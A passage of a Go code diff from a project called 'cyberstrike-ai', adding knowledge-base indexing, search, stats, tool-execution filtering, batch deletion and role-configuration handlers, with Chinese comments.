|
||||
// 如果有搜索关键词,使用搜索方法;否则使用普通方法
|
||||
if searchQuery != "" {
|
||||
conversations, err = h.db.SearchConversationsByGroup(groupID, searchQuery)
|
||||
} else {
|
||||
conversations, err = h.db.GetConversationsByGroup(groupID)
|
||||
}
|
||||
|
||||
conversations, err := h.db.GetConversationsByGroup(groupID)
|
||||
if err != nil {
|
||||
h.logger.Error("获取分组对话失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
|
||||
@@ -4,6 +4,7 @@ import (
|
||||
"context"
|
||||
"fmt"
|
||||
"net/http"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
"cyberstrike-ai/internal/knowledge"
|
||||
@@ -14,11 +15,11 @@ import (
|
||||
|
||||
// KnowledgeHandler 知识库处理器
|
||||
type KnowledgeHandler struct {
|
||||
manager *knowledge.Manager
|
||||
manager *knowledge.Manager
|
||||
retriever *knowledge.Retriever
|
||||
indexer *knowledge.Indexer
|
||||
db *database.DB
|
||||
logger *zap.Logger
|
||||
indexer *knowledge.Indexer
|
||||
db *database.DB
|
||||
logger *zap.Logger
|
||||
}
|
||||
|
||||
// NewKnowledgeHandler 创建新的知识库处理器
|
||||
@@ -54,7 +55,7 @@ func (h *KnowledgeHandler) GetCategories(c *gin.Context) {
|
||||
func (h *KnowledgeHandler) GetItems(c *gin.Context) {
|
||||
category := c.Query("category")
|
||||
searchKeyword := c.Query("search") // 搜索关键字
|
||||
|
||||
|
||||
// 如果提供了搜索关键字,执行关键字搜索(在所有数据中搜索)
|
||||
if searchKeyword != "" {
|
||||
items, err := h.manager.SearchItemsByKeyword(searchKeyword, category)
|
||||
@@ -101,10 +102,10 @@ func (h *KnowledgeHandler) GetItems(c *gin.Context) {
|
||||
})
|
||||
return
|
||||
}
|
||||
|
||||
|
||||
// 分页模式:categoryPage=true 表示按分类分页,否则按项分页(向后兼容)
|
||||
categoryPageMode := c.Query("categoryPage") != "false" // 默认使用分类分页
|
||||
|
||||
|
||||
// 分页参数
|
||||
limit := 50 // 默认每页50条(分类分页时为分类数,项分页时为项数)
|
||||
offset := 0
|
||||
@@ -191,9 +192,9 @@ func (h *KnowledgeHandler) GetItems(c *gin.Context) {
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"items": items,
|
||||
"total": total,
|
||||
"limit": limit,
|
||||
"items": items,
|
||||
"total": total,
|
||||
"limit": limit,
|
||||
"offset": offset,
|
||||
})
|
||||
} else {
|
||||
@@ -206,9 +207,9 @@ func (h *KnowledgeHandler) GetItems(c *gin.Context) {
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"items": items,
|
||||
"total": total,
|
||||
"limit": limit,
|
||||
"items": items,
|
||||
"total": total,
|
||||
"limit": limit,
|
||||
"offset": offset,
|
||||
})
|
||||
}
|
||||
@@ -336,18 +337,58 @@ func (h *KnowledgeHandler) ScanKnowledgeBase(c *gin.Context) {
|
||||
go func() {
|
||||
ctx := context.Background()
|
||||
h.logger.Info("开始增量索引", zap.Int("count", len(itemsToIndex)))
|
||||
failedCount := 0
|
||||
consecutiveFailures := 0
|
||||
var firstFailureItemID string
|
||||
var firstFailureError error
|
||||
|
||||
for i, itemID := range itemsToIndex {
|
||||
if err := h.indexer.IndexItem(ctx, itemID); err != nil {
|
||||
h.logger.Warn("索引知识项失败", zap.String("itemId", itemID), zap.Error(err))
|
||||
failedCount++
|
||||
consecutiveFailures++
|
||||
|
||||
// 只在第一个失败时记录详细日志
|
||||
if consecutiveFailures == 1 {
|
||||
firstFailureItemID = itemID
|
||||
firstFailureError = err
|
||||
h.logger.Warn("索引知识项失败",
|
||||
zap.String("itemId", itemID),
|
||||
zap.Int("totalItems", len(itemsToIndex)),
|
||||
zap.Error(err),
|
||||
)
|
||||
}
|
||||
|
||||
// 如果连续失败2次,立即停止增量索引
|
||||
if consecutiveFailures >= 2 {
|
||||
h.logger.Error("连续索引失败次数过多,立即停止增量索引",
|
||||
zap.Int("consecutiveFailures", consecutiveFailures),
|
||||
zap.Int("totalItems", len(itemsToIndex)),
|
||||
zap.Int("processedItems", i+1),
|
||||
zap.String("firstFailureItemId", firstFailureItemID),
|
||||
zap.Error(firstFailureError),
|
||||
)
|
||||
break
|
||||
}
|
||||
continue
|
||||
}
|
||||
h.logger.Info("索引进度", zap.Int("current", i+1), zap.Int("total", len(itemsToIndex)))
|
||||
|
||||
// 成功时重置连续失败计数
|
||||
if consecutiveFailures > 0 {
|
||||
consecutiveFailures = 0
|
||||
firstFailureItemID = ""
|
||||
firstFailureError = nil
|
||||
}
|
||||
|
||||
// 减少进度日志频率
|
||||
if (i+1)%10 == 0 || i+1 == len(itemsToIndex) {
|
||||
h.logger.Info("索引进度", zap.Int("current", i+1), zap.Int("total", len(itemsToIndex)), zap.Int("failed", failedCount))
|
||||
}
|
||||
}
|
||||
h.logger.Info("增量索引完成", zap.Int("totalItems", len(itemsToIndex)))
|
||||
h.logger.Info("增量索引完成", zap.Int("totalItems", len(itemsToIndex)), zap.Int("failedCount", failedCount))
|
||||
}()
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"message": fmt.Sprintf("扫描完成,开始索引 %d 个新添加或更新的知识项", len(itemsToIndex)),
|
||||
"message": fmt.Sprintf("扫描完成,开始索引 %d 个新添加或更新的知识项", len(itemsToIndex)),
|
||||
"items_to_index": len(itemsToIndex),
|
||||
})
|
||||
}
|
||||
@@ -396,6 +437,18 @@ func (h *KnowledgeHandler) GetIndexStatus(c *gin.Context) {
|
||||
return
|
||||
}
|
||||
|
||||
// 获取索引器的错误信息
|
||||
if h.indexer != nil {
|
||||
lastError, lastErrorTime := h.indexer.GetLastError()
|
||||
if lastError != "" {
|
||||
// 如果错误是最近发生的(5分钟内),则返回错误信息
|
||||
if time.Since(lastErrorTime) < 5*time.Minute {
|
||||
status["last_error"] = lastError
|
||||
status["last_error_time"] = lastErrorTime.Format(time.RFC3339)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, status)
|
||||
}
|
||||
|
||||
@@ -417,10 +470,25 @@ func (h *KnowledgeHandler) Search(c *gin.Context) {
|
||||
c.JSON(http.StatusOK, gin.H{"results": results})
|
||||
}
|
||||
|
||||
// GetStats 获取知识库统计信息
|
||||
func (h *KnowledgeHandler) GetStats(c *gin.Context) {
|
||||
totalCategories, totalItems, err := h.manager.GetStats()
|
||||
if err != nil {
|
||||
h.logger.Error("获取知识库统计信息失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"enabled": true,
|
||||
"total_categories": totalCategories,
|
||||
"total_items": totalItems,
|
||||
})
|
||||
}
|
||||
|
||||
// 辅助函数:解析整数
|
||||
func parseInt(s string) (int, error) {
|
||||
var result int
|
||||
_, err := fmt.Sscanf(s, "%d", &result)
|
||||
return result, err
|
||||
}
|
||||
|
||||
|
||||
@@ -3,6 +3,7 @@ package handler
|
||||
import (
|
||||
"net/http"
|
||||
"strconv"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
@@ -66,8 +67,10 @@ func (h *MonitorHandler) Monitor(c *gin.Context) {
|
||||
|
||||
// 解析状态筛选参数
|
||||
status := c.Query("status")
|
||||
// 解析工具筛选参数
|
||||
toolName := c.Query("tool")
|
||||
|
||||
executions, total := h.loadExecutionsWithPagination(page, pageSize, status)
|
||||
executions, total := h.loadExecutionsWithPagination(page, pageSize, status, toolName)
|
||||
stats := h.loadStats()
|
||||
|
||||
totalPages := (total + pageSize - 1) / pageSize
|
||||
@@ -87,18 +90,21 @@ func (h *MonitorHandler) Monitor(c *gin.Context) {
|
||||
}
|
||||
|
||||
func (h *MonitorHandler) loadExecutions() []*mcp.ToolExecution {
|
||||
executions, _ := h.loadExecutionsWithPagination(1, 1000, "")
|
||||
executions, _ := h.loadExecutionsWithPagination(1, 1000, "", "")
|
||||
return executions
|
||||
}
|
||||
|
||||
func (h *MonitorHandler) loadExecutionsWithPagination(page, pageSize int, status string) ([]*mcp.ToolExecution, int) {
|
||||
func (h *MonitorHandler) loadExecutionsWithPagination(page, pageSize int, status, toolName string) ([]*mcp.ToolExecution, int) {
|
||||
if h.db == nil {
|
||||
allExecutions := h.mcpServer.GetAllExecutions()
|
||||
// 如果指定了状态筛选,先进行筛选
|
||||
if status != "" {
|
||||
// 如果指定了状态筛选或工具筛选,先进行筛选
|
||||
if status != "" || toolName != "" {
|
||||
filtered := make([]*mcp.ToolExecution, 0)
|
||||
for _, exec := range allExecutions {
|
||||
if exec.Status == status {
|
||||
matchStatus := status == "" || exec.Status == status
|
||||
// 支持部分匹配(模糊搜索)
|
||||
matchTool := toolName == "" || strings.Contains(strings.ToLower(exec.ToolName), strings.ToLower(toolName))
|
||||
if matchStatus && matchTool {
|
||||
filtered = append(filtered, exec)
|
||||
}
|
||||
}
|
||||
@@ -117,15 +123,18 @@ func (h *MonitorHandler) loadExecutionsWithPagination(page, pageSize int, status
|
||||
}
|
||||
|
||||
offset := (page - 1) * pageSize
|
||||
executions, err := h.db.LoadToolExecutionsWithPagination(offset, pageSize, status)
|
||||
executions, err := h.db.LoadToolExecutionsWithPagination(offset, pageSize, status, toolName)
|
||||
if err != nil {
|
||||
h.logger.Warn("从数据库加载执行记录失败,回退到内存数据", zap.Error(err))
|
||||
allExecutions := h.mcpServer.GetAllExecutions()
|
||||
// 如果指定了状态筛选,先进行筛选
|
||||
if status != "" {
|
||||
// 如果指定了状态筛选或工具筛选,先进行筛选
|
||||
if status != "" || toolName != "" {
|
||||
filtered := make([]*mcp.ToolExecution, 0)
|
||||
for _, exec := range allExecutions {
|
||||
if exec.Status == status {
|
||||
matchStatus := status == "" || exec.Status == status
|
||||
// 支持部分匹配(模糊搜索)
|
||||
matchTool := toolName == "" || strings.Contains(strings.ToLower(exec.ToolName), strings.ToLower(toolName))
|
||||
if matchStatus && matchTool {
|
||||
filtered = append(filtered, exec)
|
||||
}
|
||||
}
|
||||
@@ -143,8 +152,8 @@ func (h *MonitorHandler) loadExecutionsWithPagination(page, pageSize int, status
|
||||
return allExecutions[offset:end], total
|
||||
}
|
||||
|
||||
// 获取总数(考虑状态筛选)
|
||||
total, err := h.db.CountToolExecutions(status)
|
||||
// 获取总数(考虑状态筛选和工具筛选)
|
||||
total, err := h.db.CountToolExecutions(status, toolName)
|
||||
if err != nil {
|
||||
h.logger.Warn("获取执行记录总数失败", zap.Error(err))
|
||||
// 回退:使用已加载的记录数估算
|
||||
@@ -298,4 +307,79 @@ func (h *MonitorHandler) DeleteExecution(c *gin.Context) {
|
||||
c.JSON(http.StatusOK, gin.H{"message": "执行记录已删除(如果存在)"})
|
||||
}
|
||||
|
||||
// DeleteExecutions 批量删除执行记录
|
||||
func (h *MonitorHandler) DeleteExecutions(c *gin.Context) {
|
||||
var request struct {
|
||||
IDs []string `json:"ids"`
|
||||
}
|
||||
|
||||
if err := c.ShouldBindJSON(&request); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "请求参数无效: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if len(request.IDs) == 0 {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "执行记录ID列表不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
// 如果使用数据库,先获取执行记录信息,然后删除并更新统计
|
||||
if h.db != nil {
|
||||
// 先获取执行记录信息(用于更新统计)
|
||||
executions, err := h.db.GetToolExecutionsByIds(request.IDs)
|
||||
if err != nil {
|
||||
h.logger.Error("获取执行记录失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "获取执行记录失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 按工具名称分组统计需要减少的数量
|
||||
toolStats := make(map[string]struct {
|
||||
totalCalls int
|
||||
successCalls int
|
||||
failedCalls int
|
||||
})
|
||||
|
||||
for _, exec := range executions {
|
||||
if exec.ToolName == "" {
|
||||
continue
|
||||
}
|
||||
|
||||
stats := toolStats[exec.ToolName]
|
||||
stats.totalCalls++
|
||||
if exec.Status == "failed" {
|
||||
stats.failedCalls++
|
||||
} else if exec.Status == "completed" {
|
||||
stats.successCalls++
|
||||
}
|
||||
toolStats[exec.ToolName] = stats
|
||||
}
|
||||
|
||||
// 批量删除执行记录
|
||||
err = h.db.DeleteToolExecutions(request.IDs)
|
||||
if err != nil {
|
||||
h.logger.Error("批量删除执行记录失败", zap.Error(err), zap.Int("count", len(request.IDs)))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "批量删除执行记录失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 更新统计信息(减少相应的计数)
|
||||
for toolName, stats := range toolStats {
|
||||
if err := h.db.DecreaseToolStats(toolName, stats.totalCalls, stats.successCalls, stats.failedCalls); err != nil {
|
||||
h.logger.Warn("更新统计信息失败", zap.Error(err), zap.String("toolName", toolName))
|
||||
// 不返回错误,因为记录已经删除成功
|
||||
}
|
||||
}
|
||||
|
||||
h.logger.Info("批量删除执行记录成功", zap.Int("count", len(request.IDs)))
|
||||
c.JSON(http.StatusOK, gin.H{"message": "成功删除执行记录", "deleted": len(executions)})
|
||||
return
|
||||
}
|
||||
|
||||
// 如果不使用数据库,尝试从内存中删除(内部MCP服务器)
|
||||
// 注意:内存中的记录可能已经被清理,所以这里只记录日志
|
||||
h.logger.Info("尝试批量删除内存中的执行记录", zap.Int("count", len(request.IDs)))
|
||||
c.JSON(http.StatusOK, gin.H{"message": "执行记录已删除(如果存在)"})
|
||||
}
|
||||
|
||||
|
||||
|
||||
@@ -0,0 +1,487 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"net/http"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"regexp"
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
|
||||
"gopkg.in/yaml.v3"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// RoleHandler 角色处理器
|
||||
type RoleHandler struct {
|
||||
config *config.Config
|
||||
configPath string
|
||||
logger *zap.Logger
|
||||
skillsManager SkillsManager // Skills管理器接口(可选)
|
||||
}
|
||||
|
||||
// SkillsManager Skills管理器接口
|
||||
type SkillsManager interface {
|
||||
ListSkills() ([]string, error)
|
||||
}
|
||||
|
||||
// NewRoleHandler 创建新的角色处理器
|
||||
func NewRoleHandler(cfg *config.Config, configPath string, logger *zap.Logger) *RoleHandler {
|
||||
return &RoleHandler{
|
||||
config: cfg,
|
||||
configPath: configPath,
|
||||
logger: logger,
|
||||
}
|
||||
}
|
||||
|
||||
// SetSkillsManager 设置Skills管理器
|
||||
func (h *RoleHandler) SetSkillsManager(manager SkillsManager) {
|
||||
h.skillsManager = manager
|
||||
}
|
||||
|
||||
// GetSkills 获取所有可用的skills列表
|
||||
func (h *RoleHandler) GetSkills(c *gin.Context) {
|
||||
if h.skillsManager == nil {
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"skills": []string{},
|
||||
})
|
||||
return
|
||||
}
|
||||
|
||||
skills, err := h.skillsManager.ListSkills()
|
||||
if err != nil {
|
||||
h.logger.Warn("获取skills列表失败", zap.Error(err))
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"skills": []string{},
|
||||
})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"skills": skills,
|
||||
})
|
||||
}
|
||||
|
||||
// GetRoles 获取所有角色
|
||||
func (h *RoleHandler) GetRoles(c *gin.Context) {
|
||||
if h.config.Roles == nil {
|
||||
h.config.Roles = make(map[string]config.RoleConfig)
|
||||
}
|
||||
|
||||
roles := make([]config.RoleConfig, 0, len(h.config.Roles))
|
||||
for key, role := range h.config.Roles {
|
||||
// 确保角色的key与name一致
|
||||
if role.Name == "" {
|
||||
role.Name = key
|
||||
}
|
||||
roles = append(roles, role)
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"roles": roles,
|
||||
})
|
||||
}
|
||||
|
||||
// GetRole 获取单个角色
|
||||
func (h *RoleHandler) GetRole(c *gin.Context) {
|
||||
roleName := c.Param("name")
|
||||
if roleName == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "角色名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
if h.config.Roles == nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "角色不存在"})
|
||||
return
|
||||
}
|
||||
|
||||
role, exists := h.config.Roles[roleName]
|
||||
if !exists {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "角色不存在"})
|
||||
return
|
||||
}
|
||||
|
||||
// 确保角色的name与key一致
|
||||
if role.Name == "" {
|
||||
role.Name = roleName
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"role": role,
|
||||
})
|
||||
}
|
||||
|
||||
// UpdateRole 更新角色
|
||||
func (h *RoleHandler) UpdateRole(c *gin.Context) {
|
||||
roleName := c.Param("name")
|
||||
if roleName == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "角色名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
var req config.RoleConfig
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 确保角色名称与请求中的name一致
|
||||
if req.Name == "" {
|
||||
req.Name = roleName
|
||||
}
|
||||
|
||||
// 初始化Roles map
|
||||
if h.config.Roles == nil {
|
||||
h.config.Roles = make(map[string]config.RoleConfig)
|
||||
}
|
||||
|
||||
// 删除所有与角色name相同但key不同的旧角色(避免重复)
|
||||
// 使用角色name作为key,确保唯一性
|
||||
finalKey := req.Name
|
||||
keysToDelete := make([]string, 0)
|
||||
for key := range h.config.Roles {
|
||||
// 如果key与最终的key不同,但name相同,则标记为删除
|
||||
if key != finalKey {
|
||||
role := h.config.Roles[key]
|
||||
// 确保角色的name字段正确设置
|
||||
if role.Name == "" {
|
||||
role.Name = key
|
||||
}
|
||||
if role.Name == req.Name {
|
||||
keysToDelete = append(keysToDelete, key)
|
||||
}
|
||||
}
|
||||
}
|
||||
// 删除旧的角色
|
||||
for _, key := range keysToDelete {
|
||||
delete(h.config.Roles, key)
|
||||
h.logger.Info("删除重复的角色", zap.String("oldKey", key), zap.String("name", req.Name))
|
||||
}
|
||||
|
||||
// 如果当前更新的key与最终key不同,也需要删除旧的
|
||||
if roleName != finalKey {
|
||||
delete(h.config.Roles, roleName)
|
||||
}
|
||||
|
||||
// 如果角色名称改变,需要删除旧文件
|
||||
if roleName != finalKey {
|
||||
configDir := filepath.Dir(h.configPath)
|
||||
rolesDir := h.config.RolesDir
|
||||
if rolesDir == "" {
|
||||
rolesDir = "roles" // 默认目录
|
||||
}
|
||||
|
||||
// 如果是相对路径,相对于配置文件所在目录
|
||||
if !filepath.IsAbs(rolesDir) {
|
||||
rolesDir = filepath.Join(configDir, rolesDir)
|
||||
}
|
||||
|
||||
// 删除旧的角色文件
|
||||
oldSafeFileName := sanitizeFileName(roleName)
|
||||
oldRoleFileYaml := filepath.Join(rolesDir, oldSafeFileName+".yaml")
|
||||
oldRoleFileYml := filepath.Join(rolesDir, oldSafeFileName+".yml")
|
||||
|
||||
if _, err := os.Stat(oldRoleFileYaml); err == nil {
|
||||
if err := os.Remove(oldRoleFileYaml); err != nil {
|
||||
h.logger.Warn("删除旧角色配置文件失败", zap.String("file", oldRoleFileYaml), zap.Error(err))
|
||||
}
|
||||
}
|
||||
if _, err := os.Stat(oldRoleFileYml); err == nil {
|
||||
if err := os.Remove(oldRoleFileYml); err != nil {
|
||||
h.logger.Warn("删除旧角色配置文件失败", zap.String("file", oldRoleFileYml), zap.Error(err))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 使用角色name作为key来保存(确保唯一性)
|
||||
h.config.Roles[finalKey] = req
|
||||
|
||||
// 保存配置到文件
|
||||
if err := h.saveConfig(); err != nil {
|
||||
h.logger.Error("保存配置失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
h.logger.Info("更新角色", zap.String("oldKey", roleName), zap.String("newKey", finalKey), zap.String("name", req.Name))
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"message": "角色已更新",
|
||||
"role": req,
|
||||
})
|
||||
}
|
||||
|
||||
// CreateRole 创建新角色
|
||||
func (h *RoleHandler) CreateRole(c *gin.Context) {
|
||||
var req config.RoleConfig
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if req.Name == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "角色名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
// 初始化Roles map
|
||||
if h.config.Roles == nil {
|
||||
h.config.Roles = make(map[string]config.RoleConfig)
|
||||
}
|
||||
|
||||
// 检查角色是否已存在
|
||||
if _, exists := h.config.Roles[req.Name]; exists {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "角色已存在"})
|
||||
return
|
||||
}
|
||||
|
||||
// 创建角色(默认启用)
|
||||
if !req.Enabled {
|
||||
req.Enabled = true
|
||||
}
|
||||
|
||||
h.config.Roles[req.Name] = req
|
||||
|
||||
// 保存配置到文件
|
||||
if err := h.saveConfig(); err != nil {
|
||||
h.logger.Error("保存配置失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
h.logger.Info("创建角色", zap.String("roleName", req.Name))
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"message": "角色已创建",
|
||||
"role": req,
|
||||
})
|
||||
}
|
||||
|
||||
// DeleteRole 删除角色
|
||||
func (h *RoleHandler) DeleteRole(c *gin.Context) {
|
||||
roleName := c.Param("name")
|
||||
if roleName == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "角色名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
if h.config.Roles == nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "角色不存在"})
|
||||
return
|
||||
}
|
||||
|
||||
if _, exists := h.config.Roles[roleName]; !exists {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "角色不存在"})
|
||||
return
|
||||
}
|
||||
|
||||
// 不允许删除"默认"角色
|
||||
if roleName == "默认" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "不能删除默认角色"})
|
||||
return
|
||||
}
|
||||
|
||||
delete(h.config.Roles, roleName)
|
||||
|
||||
// 删除对应的角色文件
|
||||
configDir := filepath.Dir(h.configPath)
|
||||
rolesDir := h.config.RolesDir
|
||||
if rolesDir == "" {
|
||||
rolesDir = "roles" // 默认目录
|
||||
}
|
||||
|
||||
// 如果是相对路径,相对于配置文件所在目录
|
||||
if !filepath.IsAbs(rolesDir) {
|
||||
rolesDir = filepath.Join(configDir, rolesDir)
|
||||
}
|
||||
|
||||
// 尝试删除角色文件(.yaml 和 .yml)
|
||||
safeFileName := sanitizeFileName(roleName)
|
||||
roleFileYaml := filepath.Join(rolesDir, safeFileName+".yaml")
|
||||
roleFileYml := filepath.Join(rolesDir, safeFileName+".yml")
|
||||
|
||||
// 删除 .yaml 文件(如果存在)
|
||||
if _, err := os.Stat(roleFileYaml); err == nil {
|
||||
if err := os.Remove(roleFileYaml); err != nil {
|
||||
h.logger.Warn("删除角色配置文件失败", zap.String("file", roleFileYaml), zap.Error(err))
|
||||
} else {
|
||||
h.logger.Info("已删除角色配置文件", zap.String("file", roleFileYaml))
|
||||
}
|
||||
}
|
||||
|
||||
// 删除 .yml 文件(如果存在)
|
||||
if _, err := os.Stat(roleFileYml); err == nil {
|
||||
if err := os.Remove(roleFileYml); err != nil {
|
||||
h.logger.Warn("删除角色配置文件失败", zap.String("file", roleFileYml), zap.Error(err))
|
||||
} else {
|
||||
h.logger.Info("已删除角色配置文件", zap.String("file", roleFileYml))
|
||||
}
|
||||
}
|
||||
|
||||
h.logger.Info("删除角色", zap.String("roleName", roleName))
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"message": "角色已删除",
|
||||
})
|
||||
}
|
||||
|
||||
// saveConfig 保存配置到目录中的文件
|
||||
func (h *RoleHandler) saveConfig() error {
|
||||
configDir := filepath.Dir(h.configPath)
|
||||
rolesDir := h.config.RolesDir
|
||||
if rolesDir == "" {
|
||||
rolesDir = "roles" // 默认目录
|
||||
}
|
||||
|
||||
// 如果是相对路径,相对于配置文件所在目录
|
||||
if !filepath.IsAbs(rolesDir) {
|
||||
rolesDir = filepath.Join(configDir, rolesDir)
|
||||
}
|
||||
|
||||
// 确保目录存在
|
||||
if err := os.MkdirAll(rolesDir, 0755); err != nil {
|
||||
return fmt.Errorf("创建角色目录失败: %w", err)
|
||||
}
|
||||
|
||||
// 保存每个角色到独立的文件
|
||||
if h.config.Roles != nil {
|
||||
for roleName, role := range h.config.Roles {
|
||||
// 确保角色名称正确设置
|
||||
if role.Name == "" {
|
||||
role.Name = roleName
|
||||
}
|
||||
|
||||
// 使用角色名称作为文件名(安全化文件名,避免特殊字符)
|
||||
safeFileName := sanitizeFileName(role.Name)
|
||||
roleFile := filepath.Join(rolesDir, safeFileName+".yaml")
|
||||
|
||||
// 将角色配置序列化为YAML
|
||||
roleData, err := yaml.Marshal(&role)
|
||||
if err != nil {
|
||||
h.logger.Error("序列化角色配置失败", zap.String("role", roleName), zap.Error(err))
|
||||
continue
|
||||
}
|
||||
|
||||
// 处理icon字段:确保包含\U的icon值被引号包围(YAML需要引号才能正确解析Unicode转义)
|
||||
roleDataStr := string(roleData)
|
||||
if role.Icon != "" && strings.HasPrefix(role.Icon, "\\U") {
|
||||
// 匹配 icon: \UXXXXXXXX 格式(没有引号),排除已经有引号的情况
|
||||
// 使用负向前瞻确保后面没有引号,或者直接匹配没有引号的情况
|
||||
re := regexp.MustCompile(`(?m)^(icon:\s+)(\\U[0-9A-F]{8})(\s*)$`)
|
||||
roleDataStr = re.ReplaceAllString(roleDataStr, `${1}"${2}"${3}`)
|
||||
roleData = []byte(roleDataStr)
|
||||
}
|
||||
|
||||
// 写入文件
|
||||
if err := os.WriteFile(roleFile, roleData, 0644); err != nil {
|
||||
h.logger.Error("保存角色配置文件失败", zap.String("role", roleName), zap.String("file", roleFile), zap.Error(err))
|
||||
continue
|
||||
}
|
||||
|
||||
h.logger.Info("角色配置已保存到文件", zap.String("role", roleName), zap.String("file", roleFile))
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// sanitizeFileName 将角色名称转换为安全的文件名
|
||||
func sanitizeFileName(name string) string {
|
||||
// 替换可能不安全的字符
|
||||
replacer := map[rune]string{
|
||||
'/': "_",
|
||||
'\\': "_",
|
||||
':': "_",
|
||||
'*': "_",
|
||||
'?': "_",
|
||||
'"': "_",
|
||||
'<': "_",
|
||||
'>': "_",
|
||||
'|': "_",
|
||||
' ': "_",
|
||||
}
|
||||
|
||||
var result []rune
|
||||
for _, r := range name {
|
||||
if replacement, ok := replacer[r]; ok {
|
||||
result = append(result, []rune(replacement)...)
|
||||
} else {
|
||||
result = append(result, r)
|
||||
}
|
||||
}
|
||||
|
||||
fileName := string(result)
|
||||
// 如果文件名为空,使用默认名称
|
||||
if fileName == "" {
|
||||
fileName = "role"
|
||||
}
|
||||
|
||||
return fileName
|
||||
}
|
||||
|
||||
// updateRolesConfig 更新角色配置
|
||||
func updateRolesConfig(doc *yaml.Node, cfg config.RolesConfig) {
|
||||
root := doc.Content[0]
|
||||
rolesNode := ensureMap(root, "roles")
|
||||
|
||||
// 清空现有角色
|
||||
if rolesNode.Kind == yaml.MappingNode {
|
||||
rolesNode.Content = nil
|
||||
}
|
||||
|
||||
// 添加新角色(使用name作为key,确保唯一性)
|
||||
if cfg.Roles != nil {
|
||||
// 先建立一个以name为key的map,去重(保留最后一个)
|
||||
rolesByName := make(map[string]config.RoleConfig)
|
||||
for roleKey, role := range cfg.Roles {
|
||||
// 确保角色的name字段正确设置
|
||||
if role.Name == "" {
|
||||
role.Name = roleKey
|
||||
}
|
||||
// 使用name作为最终key,如果有多个key对应相同的name,只保留最后一个
|
||||
rolesByName[role.Name] = role
|
||||
}
|
||||
|
||||
// 将去重后的角色写入YAML
|
||||
for roleName, role := range rolesByName {
|
||||
roleNode := ensureMap(rolesNode, roleName)
|
||||
setStringInMap(roleNode, "name", role.Name)
|
||||
setStringInMap(roleNode, "description", role.Description)
|
||||
setStringInMap(roleNode, "user_prompt", role.UserPrompt)
|
||||
if role.Icon != "" {
|
||||
setStringInMap(roleNode, "icon", role.Icon)
|
||||
}
|
||||
setBoolInMap(roleNode, "enabled", role.Enabled)
|
||||
|
||||
// 添加工具列表(优先使用tools字段)
|
||||
if len(role.Tools) > 0 {
|
||||
toolsNode := ensureArray(roleNode, "tools")
|
||||
toolsNode.Content = nil
|
||||
for _, toolKey := range role.Tools {
|
||||
toolNode := &yaml.Node{Kind: yaml.ScalarNode, Tag: "!!str", Value: toolKey}
|
||||
toolsNode.Content = append(toolsNode.Content, toolNode)
|
||||
}
|
||||
} else if len(role.MCPs) > 0 {
|
||||
// 向后兼容:如果没有tools但有mcps,保存mcps
|
